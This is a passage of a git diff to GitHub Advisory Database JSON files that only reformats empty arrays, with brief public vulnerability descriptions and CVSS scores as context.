b/advisories/unreviewed/2022/04/GHSA-45g9-98w8-8m3w/GHSA-45g9-98w8-8m3w.json index 01a67398ff1..83066d71a93 100644 --- a/advisories/unreviewed/2022/04/GHSA-45g9-98w8-8m3w/GHSA-45g9-98w8-8m3w.json +++ b/advisories/unreviewed/2022/04/GHSA-45g9-98w8-8m3w/GHSA-45g9-98w8-8m3w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/04/GHSA-46h4-89gx-37xj/GHSA-46h4-89gx-37xj.json b/advisories/unreviewed/2022/04/GHSA-46h4-89gx-37xj/GHSA-46h4-89gx-37xj.json index 6dc3ac3f595..021544ad651 100644 --- a/advisories/unreviewed/2022/04/GHSA-46h4-89gx-37xj/GHSA-46h4-89gx-37xj.json +++ b/advisories/unreviewed/2022/04/GHSA-46h4-89gx-37xj/GHSA-46h4-89gx-37xj.json @@ -7,12 +7,8 @@ "CVE-2022-29268" ], "details": "Bitrix through 7.5.0 allows remote attackers to execute arbitrary code by using the restore.php Upload From Local Disk feature.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/04/GHSA-473j-54wp-prrq/GHSA-473j-54wp-prrq.json b/advisories/unreviewed/2022/04/GHSA-473j-54wp-prrq/GHSA-473j-54wp-prrq.json index f0fd11a9262..74bc4fa7124 100644 --- a/advisories/unreviewed/2022/04/GHSA-473j-54wp-prrq/GHSA-473j-54wp-prrq.json +++ b/advisories/unreviewed/2022/04/GHSA-473j-54wp-prrq/GHSA-473j-54wp-prrq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-4v8x-qr64-whf2/GHSA-4v8x-qr64-whf2.json b/advisories/unreviewed/2022/04/GHSA-4v8x-qr64-whf2/GHSA-4v8x-qr64-whf2.json index 44b95bf581e..12ec607dcd2 100644 --- a/advisories/unreviewed/2022/04/GHSA-4v8x-qr64-whf2/GHSA-4v8x-qr64-whf2.json +++ b/advisories/unreviewed/2022/04/GHSA-4v8x-qr64-whf2/GHSA-4v8x-qr64-whf2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-6ch5-7cpv-r7g4/GHSA-6ch5-7cpv-r7g4.json b/advisories/unreviewed/2022/04/GHSA-6ch5-7cpv-r7g4/GHSA-6ch5-7cpv-r7g4.json index d421ddbd7ad..ea6ef42ef97 100644 --- a/advisories/unreviewed/2022/04/GHSA-6ch5-7cpv-r7g4/GHSA-6ch5-7cpv-r7g4.json +++ b/advisories/unreviewed/2022/04/GHSA-6ch5-7cpv-r7g4/GHSA-6ch5-7cpv-r7g4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-7g2m-g56q-3xvq/GHSA-7g2m-g56q-3xvq.json b/advisories/unreviewed/2022/04/GHSA-7g2m-g56q-3xvq/GHSA-7g2m-g56q-3xvq.json index 91e7bceb9b3..8728f7c19b3 100644 --- a/advisories/unreviewed/2022/04/GHSA-7g2m-g56q-3xvq/GHSA-7g2m-g56q-3xvq.json +++ b/advisories/unreviewed/2022/04/GHSA-7g2m-g56q-3xvq/GHSA-7g2m-g56q-3xvq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-7gvj-6c98-x7gj/GHSA-7gvj-6c98-x7gj.json b/advisories/unreviewed/2022/04/GHSA-7gvj-6c98-x7gj/GHSA-7gvj-6c98-x7gj.json index bade77dc005..5ee0be368c8 100644 --- a/advisories/unreviewed/2022/04/GHSA-7gvj-6c98-x7gj/GHSA-7gvj-6c98-x7gj.json +++ b/advisories/unreviewed/2022/04/GHSA-7gvj-6c98-x7gj/GHSA-7gvj-6c98-x7gj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-85p5-hj2f-5phg/GHSA-85p5-hj2f-5phg.json b/advisories/unreviewed/2022/04/GHSA-85p5-hj2f-5phg/GHSA-85p5-hj2f-5phg.json index 32d2958f783..5b41dc0fc90 100644 --- a/advisories/unreviewed/2022/04/GHSA-85p5-hj2f-5phg/GHSA-85p5-hj2f-5phg.json +++ b/advisories/unreviewed/2022/04/GHSA-85p5-hj2f-5phg/GHSA-85p5-hj2f-5phg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-8cfh-pxvj-mfvq/GHSA-8cfh-pxvj-mfvq.json b/advisories/unreviewed/2022/04/GHSA-8cfh-pxvj-mfvq/GHSA-8cfh-pxvj-mfvq.json index 31bfbf9c2d1..7d516743b69 100644 --- a/advisories/unreviewed/2022/04/GHSA-8cfh-pxvj-mfvq/GHSA-8cfh-pxvj-mfvq.json +++ b/advisories/unreviewed/2022/04/GHSA-8cfh-pxvj-mfvq/GHSA-8cfh-pxvj-mfvq.json @@ -7,12 +7,8 @@ "CVE-2021-46443" ], "details": "Spoofer 1.4.6 suffers from unquoted service paths vulnerability. An attacker as a low privileged local user can hijack the execution flow of the application to escalate privileges by inserting a malicious executable in a higher level directory with the vulnerable path.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/04/GHSA-8qg4-88g8-fvxf/GHSA-8qg4-88g8-fvxf.json b/advisories/unreviewed/2022/04/GHSA-8qg4-88g8-fvxf/GHSA-8qg4-88g8-fvxf.json index fb5b047fbce..86b19fba813 100644 --- a/advisories/unreviewed/2022/04/GHSA-8qg4-88g8-fvxf/GHSA-8qg4-88g8-fvxf.json +++ b/advisories/unreviewed/2022/04/GHSA-8qg4-88g8-fvxf/GHSA-8qg4-88g8-fvxf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-9wqp-9qj7-m4pg/GHSA-9wqp-9qj7-m4pg.json b/advisories/unreviewed/2022/04/GHSA-9wqp-9qj7-m4pg/GHSA-9wqp-9qj7-m4pg.json index fe6eb7e813d..fc44e22ae32 100644 --- a/advisories/unreviewed/2022/04/GHSA-9wqp-9qj7-m4pg/GHSA-9wqp-9qj7-m4pg.json +++ b/advisories/unreviewed/2022/04/GHSA-9wqp-9qj7-m4pg/GHSA-9wqp-9qj7-m4pg.json @@ -7,12 +7,8 @@ "CVE-2022-27306" ], "details": "The function url.parse() in Node.js v17.7.0 allows attackers to spoof a hostname.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/04/GHSA-c2v5-gh46-7gpc/GHSA-c2v5-gh46-7gpc.json b/advisories/unreviewed/2022/04/GHSA-c2v5-gh46-7gpc/GHSA-c2v5-gh46-7gpc.json index 17509f8677d..390118c325f 100644 --- a/advisories/unreviewed/2022/04/GHSA-c2v5-gh46-7gpc/GHSA-c2v5-gh46-7gpc.json +++ b/advisories/unreviewed/2022/04/GHSA-c2v5-gh46-7gpc/GHSA-c2v5-gh46-7gpc.json @@ -7,12 +7,8 @@ "CVE-2022-28396" ], "details": "Apostrophe v3.16.1 was discovered to contain a remote code execution (RCE) vulnerability via the component uploadfs.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/04/GHSA-c5j2-ggvf-gwvg/GHSA-c5j2-ggvf-gwvg.json b/advisories/unreviewed/2022/04/GHSA-c5j2-ggvf-gwvg/GHSA-c5j2-ggvf-gwvg.json index ca671e2804c..d4f45ec3ccf 100644 --- a/advisories/unreviewed/2022/04/GHSA-c5j2-ggvf-gwvg/GHSA-c5j2-ggvf-gwvg.json +++ b/advisories/unreviewed/2022/04/GHSA-c5j2-ggvf-gwvg/GHSA-c5j2-ggvf-gwvg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-cmwv-fp6x-7648/GHSA-cmwv-fp6x-7648.json b/advisories/unreviewed/2022/04/GHSA-cmwv-fp6x-7648/GHSA-cmwv-fp6x-7648.json index c59ac197d83..0a66ccbd0fe 100644 --- a/advisories/unreviewed/2022/04/GHSA-cmwv-fp6x-7648/GHSA-cmwv-fp6x-7648.json +++ b/advisories/unreviewed/2022/04/GHSA-cmwv-fp6x-7648/GHSA-cmwv-fp6x-7648.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-f69c-jr42-246r/GHSA-f69c-jr42-246r.json b/advisories/unreviewed/2022/04/GHSA-f69c-jr42-246r/GHSA-f69c-jr42-246r.json index 6775a584683..cd0730d56fe 100644 --- a/advisories/unreviewed/2022/04/GHSA-f69c-jr42-246r/GHSA-f69c-jr42-246r.json +++ b/advisories/unreviewed/2022/04/GHSA-f69c-jr42-246r/GHSA-f69c-jr42-246r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-f7xm-4pw3-gmvw/GHSA-f7xm-4pw3-gmvw.json b/advisories/unreviewed/2022/04/GHSA-f7xm-4pw3-gmvw/GHSA-f7xm-4pw3-gmvw.json index 9d30c8e4710..dd1a1fc8e4a 100644 --- a/advisories/unreviewed/2022/04/GHSA-f7xm-4pw3-gmvw/GHSA-f7xm-4pw3-gmvw.json +++ b/advisories/unreviewed/2022/04/GHSA-f7xm-4pw3-gmvw/GHSA-f7xm-4pw3-gmvw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-fw7j-vc63-x5gf/GHSA-fw7j-vc63-x5gf.json b/advisories/unreviewed/2022/04/GHSA-fw7j-vc63-x5gf/GHSA-fw7j-vc63-x5gf.json index 3d26969160f..15efccfbcab 100644 --- a/advisories/unreviewed/2022/04/GHSA-fw7j-vc63-x5gf/GHSA-fw7j-vc63-x5gf.json +++ b/advisories/unreviewed/2022/04/GHSA-fw7j-vc63-x5gf/GHSA-fw7j-vc63-x5gf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-g343-h29p-q8m3/GHSA-g343-h29p-q8m3.json b/advisories/unreviewed/2022/04/GHSA-g343-h29p-q8m3/GHSA-g343-h29p-q8m3.json index cb0fd51108f..0343f6a4ff3 100644 --- a/advisories/unreviewed/2022/04/GHSA-g343-h29p-q8m3/GHSA-g343-h29p-q8m3.json +++ b/advisories/unreviewed/2022/04/GHSA-g343-h29p-q8m3/GHSA-g343-h29p-q8m3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-g45h-2p2r-4j5j/GHSA-g45h-2p2r-4j5j.json b/advisories/unreviewed/2022/04/GHSA-g45h-2p2r-4j5j/GHSA-g45h-2p2r-4j5j.json index 25bd63d3151..6b1e670667b 100644 --- a/advisories/unreviewed/2022/04/GHSA-g45h-2p2r-4j5j/GHSA-g45h-2p2r-4j5j.json +++ b/advisories/unreviewed/2022/04/GHSA-g45h-2p2r-4j5j/GHSA-g45h-2p2r-4j5j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-gg32-6jrc-jc23/GHSA-gg32-6jrc-jc23.json b/advisories/unreviewed/2022/04/GHSA-gg32-6jrc-jc23/GHSA-gg32-6jrc-jc23.json index 5bda4abefad..a9e773e3c0a 100644 --- a/advisories/unreviewed/2022/04/GHSA-gg32-6jrc-jc23/GHSA-gg32-6jrc-jc23.json +++ b/advisories/unreviewed/2022/04/GHSA-gg32-6jrc-jc23/GHSA-gg32-6jrc-jc23.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-hvpv-5hhw-2rmf/GHSA-hvpv-5hhw-2rmf.json b/advisories/unreviewed/2022/04/GHSA-hvpv-5hhw-2rmf/GHSA-hvpv-5hhw-2rmf.json index 0f1f05cf931..cf3c6b7bc9f 100644 --- a/advisories/unreviewed/2022/04/GHSA-hvpv-5hhw-2rmf/GHSA-hvpv-5hhw-2rmf.json +++ b/advisories/unreviewed/2022/04/GHSA-hvpv-5hhw-2rmf/GHSA-hvpv-5hhw-2rmf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-hw49-57p9-2mh2/GHSA-hw49-57p9-2mh2.json b/advisories/unreviewed/2022/04/GHSA-hw49-57p9-2mh2/GHSA-hw49-57p9-2mh2.json index fcf0b6ddb24..87bc8216f31 100644 --- a/advisories/unreviewed/2022/04/GHSA-hw49-57p9-2mh2/GHSA-hw49-57p9-2mh2.json +++ b/advisories/unreviewed/2022/04/GHSA-hw49-57p9-2mh2/GHSA-hw49-57p9-2mh2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-jvjv-4h6h-m93q/GHSA-jvjv-4h6h-m93q.json b/advisories/unreviewed/2022/04/GHSA-jvjv-4h6h-m93q/GHSA-jvjv-4h6h-m93q.json index db05df24c1f..071fbefbd90 100644 --- a/advisories/unreviewed/2022/04/GHSA-jvjv-4h6h-m93q/GHSA-jvjv-4h6h-m93q.json +++ b/advisories/unreviewed/2022/04/GHSA-jvjv-4h6h-m93q/GHSA-jvjv-4h6h-m93q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-m954-vpgg-42g3/GHSA-m954-vpgg-42g3.json b/advisories/unreviewed/2022/04/GHSA-m954-vpgg-42g3/GHSA-m954-vpgg-42g3.json index ca17983bd02..76631451de0 100644 --- a/advisories/unreviewed/2022/04/GHSA-m954-vpgg-42g3/GHSA-m954-vpgg-42g3.json +++ b/advisories/unreviewed/2022/04/GHSA-m954-vpgg-42g3/GHSA-m954-vpgg-42g3.json @@ -7,12 +7,8 @@ "CVE-2021-46439" ], "details": "The WinSEGAV AutoConfig service in EG Free Antivirus v2020 suffers from a local privilege escalation vulnerability, due to unquoted paths in the service's executable path.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/04/GHSA-mm8j-7g3h-x2mj/GHSA-mm8j-7g3h-x2mj.json b/advisories/unreviewed/2022/04/GHSA-mm8j-7g3h-x2mj/GHSA-mm8j-7g3h-x2mj.json index fad16ebfa42..2765874137a 100644 --- a/advisories/unreviewed/2022/04/GHSA-mm8j-7g3h-x2mj/GHSA-mm8j-7g3h-x2mj.json +++ b/advisories/unreviewed/2022/04/GHSA-mm8j-7g3h-x2mj/GHSA-mm8j-7g3h-x2mj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-p79h-r9j3-qjg6/GHSA-p79h-r9j3-qjg6.json b/advisories/unreviewed/2022/04/GHSA-p79h-r9j3-qjg6/GHSA-p79h-r9j3-qjg6.json index 5e480fd345b..49870d04098 100644 --- a/advisories/unreviewed/2022/04/GHSA-p79h-r9j3-qjg6/GHSA-p79h-r9j3-qjg6.json +++ b/advisories/unreviewed/2022/04/GHSA-p79h-r9j3-qjg6/GHSA-p79h-r9j3-qjg6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-r59r-63rw-fm95/GHSA-r59r-63rw-fm95.json b/advisories/unreviewed/2022/04/GHSA-r59r-63rw-fm95/GHSA-r59r-63rw-fm95.json index 1ab7a06ab5d..8e6c7bea0e4 100644 --- a/advisories/unreviewed/2022/04/GHSA-r59r-63rw-fm95/GHSA-r59r-63rw-fm95.json +++ b/advisories/unreviewed/2022/04/GHSA-r59r-63rw-fm95/GHSA-r59r-63rw-fm95.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-r6wr-424x-x3qh/GHSA-r6wr-424x-x3qh.json b/advisories/unreviewed/2022/04/GHSA-r6wr-424x-x3qh/GHSA-r6wr-424x-x3qh.json index dd4bfb32f7e..7b8cb416390 100644 --- a/advisories/unreviewed/2022/04/GHSA-r6wr-424x-x3qh/GHSA-r6wr-424x-x3qh.json +++ b/advisories/unreviewed/2022/04/GHSA-r6wr-424x-x3qh/GHSA-r6wr-424x-x3qh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-w6vv-5mg8-wj8h/GHSA-w6vv-5mg8-wj8h.json b/advisories/unreviewed/2022/04/GHSA-w6vv-5mg8-wj8h/GHSA-w6vv-5mg8-wj8h.json index 694c823b7c8..38311897900 100644 --- a/advisories/unreviewed/2022/04/GHSA-w6vv-5mg8-wj8h/GHSA-w6vv-5mg8-wj8h.json +++ b/advisories/unreviewed/2022/04/GHSA-w6vv-5mg8-wj8h/GHSA-w6vv-5mg8-wj8h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-xpj6-mr3p-wcrr/GHSA-xpj6-mr3p-wcrr.json b/advisories/unreviewed/2022/04/GHSA-xpj6-mr3p-wcrr/GHSA-xpj6-mr3p-wcrr.json index 4699807756b..83357826794 100644 --- a/advisories/unreviewed/2022/04/GHSA-xpj6-mr3p-wcrr/GHSA-xpj6-mr3p-wcrr.json +++ b/advisories/unreviewed/2022/04/GHSA-xpj6-mr3p-wcrr/GHSA-xpj6-mr3p-wcrr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2273-m8gg-p2f9/GHSA-2273-m8gg-p2f9.json b/advisories/unreviewed/2022/05/GHSA-2273-m8gg-p2f9/GHSA-2273-m8gg-p2f9.json index f51f1abb3de..ed15d653a64 100644 --- a/advisories/unreviewed/2022/05/GHSA-2273-m8gg-p2f9/GHSA-2273-m8gg-p2f9.json +++ b/advisories/unreviewed/2022/05/GHSA-2273-m8gg-p2f9/GHSA-2273-m8gg-p2f9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-234j-9vr7-j7mx/GHSA-234j-9vr7-j7mx.json b/advisories/unreviewed/2022/05/GHSA-234j-9vr7-j7mx/GHSA-234j-9vr7-j7mx.json index 2b3847d3475..54cbc6f6408 100644 --- a/advisories/unreviewed/2022/05/GHSA-234j-9vr7-j7mx/GHSA-234j-9vr7-j7mx.json +++ b/advisories/unreviewed/2022/05/GHSA-234j-9vr7-j7mx/GHSA-234j-9vr7-j7mx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -55,9 +53,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-244c-5h4m-vvfc/GHSA-244c-5h4m-vvfc.json b/advisories/unreviewed/2022/05/GHSA-244c-5h4m-vvfc/GHSA-244c-5h4m-vvfc.json index 36767b4a0f1..73bfc8a0e8d 100644 --- a/advisories/unreviewed/2022/05/GHSA-244c-5h4m-vvfc/GHSA-244c-5h4m-vvfc.json +++ b/advisories/unreviewed/2022/05/GHSA-244c-5h4m-vvfc/GHSA-244c-5h4m-vvfc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-24mv-c2pp-2q4f/GHSA-24mv-c2pp-2q4f.json b/advisories/unreviewed/2022/05/GHSA-24mv-c2pp-2q4f/GHSA-24mv-c2pp-2q4f.json index d8592b0e08f..e71dcfb8263 100644 --- a/advisories/unreviewed/2022/05/GHSA-24mv-c2pp-2q4f/GHSA-24mv-c2pp-2q4f.json +++ b/advisories/unreviewed/2022/05/GHSA-24mv-c2pp-2q4f/GHSA-24mv-c2pp-2q4f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-24wx-mghc-gchm/GHSA-24wx-mghc-gchm.json b/advisories/unreviewed/2022/05/GHSA-24wx-mghc-gchm/GHSA-24wx-mghc-gchm.json index 60326212550..62ece069429 100644 --- a/advisories/unreviewed/2022/05/GHSA-24wx-mghc-gchm/GHSA-24wx-mghc-gchm.json +++ b/advisories/unreviewed/2022/05/GHSA-24wx-mghc-gchm/GHSA-24wx-mghc-gchm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-253j-mgc4-hp35/GHSA-253j-mgc4-hp35.json b/advisories/unreviewed/2022/05/GHSA-253j-mgc4-hp35/GHSA-253j-mgc4-hp35.json index e7d03ec1675..1ef92d39bb0 100644 --- a/advisories/unreviewed/2022/05/GHSA-253j-mgc4-hp35/GHSA-253j-mgc4-hp35.json +++ b/advisories/unreviewed/2022/05/GHSA-253j-mgc4-hp35/GHSA-253j-mgc4-hp35.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-259j-8rrf-r9fj/GHSA-259j-8rrf-r9fj.json b/advisories/unreviewed/2022/05/GHSA-259j-8rrf-r9fj/GHSA-259j-8rrf-r9fj.json index 259c9ff0e43..d597083dc99 100644 --- a/advisories/unreviewed/2022/05/GHSA-259j-8rrf-r9fj/GHSA-259j-8rrf-r9fj.json +++ b/advisories/unreviewed/2022/05/GHSA-259j-8rrf-r9fj/GHSA-259j-8rrf-r9fj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-26x7-mr2m-x8m5/GHSA-26x7-mr2m-x8m5.json b/advisories/unreviewed/2022/05/GHSA-26x7-mr2m-x8m5/GHSA-26x7-mr2m-x8m5.json index 30a73dc257e..e0fcc9dc1a9 100644 --- a/advisories/unreviewed/2022/05/GHSA-26x7-mr2m-x8m5/GHSA-26x7-mr2m-x8m5.json +++ b/advisories/unreviewed/2022/05/GHSA-26x7-mr2m-x8m5/GHSA-26x7-mr2m-x8m5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2c8q-5cp4-4jf7/GHSA-2c8q-5cp4-4jf7.json b/advisories/unreviewed/2022/05/GHSA-2c8q-5cp4-4jf7/GHSA-2c8q-5cp4-4jf7.json index 4f5329f4d6a..4a6d610f4a4 100644 --- a/advisories/unreviewed/2022/05/GHSA-2c8q-5cp4-4jf7/GHSA-2c8q-5cp4-4jf7.json +++ b/advisories/unreviewed/2022/05/GHSA-2c8q-5cp4-4jf7/GHSA-2c8q-5cp4-4jf7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2g6x-rfgr-7f5j/GHSA-2g6x-rfgr-7f5j.json b/advisories/unreviewed/2022/05/GHSA-2g6x-rfgr-7f5j/GHSA-2g6x-rfgr-7f5j.json index a9d7106fcd2..f1d18788afe 100644 --- a/advisories/unreviewed/2022/05/GHSA-2g6x-rfgr-7f5j/GHSA-2g6x-rfgr-7f5j.json +++ 